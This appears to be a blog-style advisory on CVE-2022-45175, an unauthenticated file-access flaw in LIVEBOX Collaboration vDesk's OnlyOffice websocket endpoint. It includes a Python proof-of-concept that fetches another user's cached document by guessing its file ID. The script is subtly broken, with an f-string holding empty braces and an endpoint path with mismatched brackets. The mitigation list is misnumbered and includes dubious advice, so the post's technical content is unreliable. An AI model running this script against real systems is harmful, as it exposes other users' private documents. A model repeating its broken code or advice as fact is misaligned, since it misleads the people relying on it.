CVE-2022-45175: LIVEBOX Collaboration vDesk Insecure Direct Object Reference Vulnerability Exploit

A recent vulnerability (CVE-2022-45175) has been discovered in LIVEBOX Collaboration vDesk through v018, which poses a significant risk to user data protection. This post offers a comprehensive insight into the vulnerability, including a code snippet, links to original sources, and details about exploiting the issue.

Background

LIVEBOX Collaboration vDesk is a popular platform for real-time document collaboration, similar to popular tools such as Google Docs or Microsoft Office 365. Through its OnlyOffice installation, the platform offers rich functionality for editing and managing documents in a secure manner. However, proper handling of document access permissions is crucial to ensuring that sensitive data is not inadvertently exposed to unauthorized individuals.

Vulnerability Details

The vulnerability in question lies in an Insecure Direct Object Reference (IDOR) issue, which occurs under the 5.6.5-3/doc/{ID-FILE]/c/{N]/{C]/websocket endpoint. This issue allows a malicious unauthenticated user to access cached files of other users in the OnlyOffice backend by merely guessing the file ID of a target document.

Proof of Concept Code Snippet

import requests

# Specify the target vDesk installation URL
target_url = 'http://vdesk.example.com';
file_id = 'guesssed-file-id' # This ID should be replaced with the correct/brute-forced one

# Craft the request to the vulnerable websocket endpoint
vulnerable_endpoint = f'{target_url}/5.6.5-3/doc/{file_id}/c/{}/{}/websocket'
response = requests.get(vulnerable_endpoint)

if response.status_code == 200:
    print("Potentially vulnerable, found content accessible via IDOR:")
    print(response.text)
else:
    print("Not vulnerable or incorrect file ID")

This simple Python script targets a LIVEBOX Collaboration vDesk installation and attempts to access a user document by providing a guessed file ID to the vulnerable endpoint. If successful, the script prints the content of the accessed file.

Mitigation Measures

Until an official patch is available for this vulnerability, users of LIVEBOX Collaboration vDesk are advised to:

1. Implement strict access controls for the websocket endpoints, limiting access only to authenticated users.
2. Implement additional security layers, such as VPNs or IP whitelisting, to restrict unauthorized access to the Vdesk installation.

Frequently monitor logs for any signs of unauthorized attempts to access the websocket endpoints.

4. Encourage users to periodically rotate file IDs to minimize the chance of a malicious user successfully guessing a valid ID.

The following sources provide in-depth information on CVE-2022-45175

1. CVE-2022-45175 - Official CVE Entry at Mitre.org
2. LIVEBOX Collaboration vDesk Official Website - Details on the affected platform and its features
3. OnlyOffice Security Advisory - Potential updates on security measures and patches related to this vulnerability

Wrapping Up

Security vulnerabilities such as CVE-2022-45175 serve as a reminder of the importance of staying up-to-date with the latest security news and patches for any software in use. Always ensure that you take necessary steps to secure your systems and keep your user data protected.

Timeline

Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/19/2023 19:28:00 UTC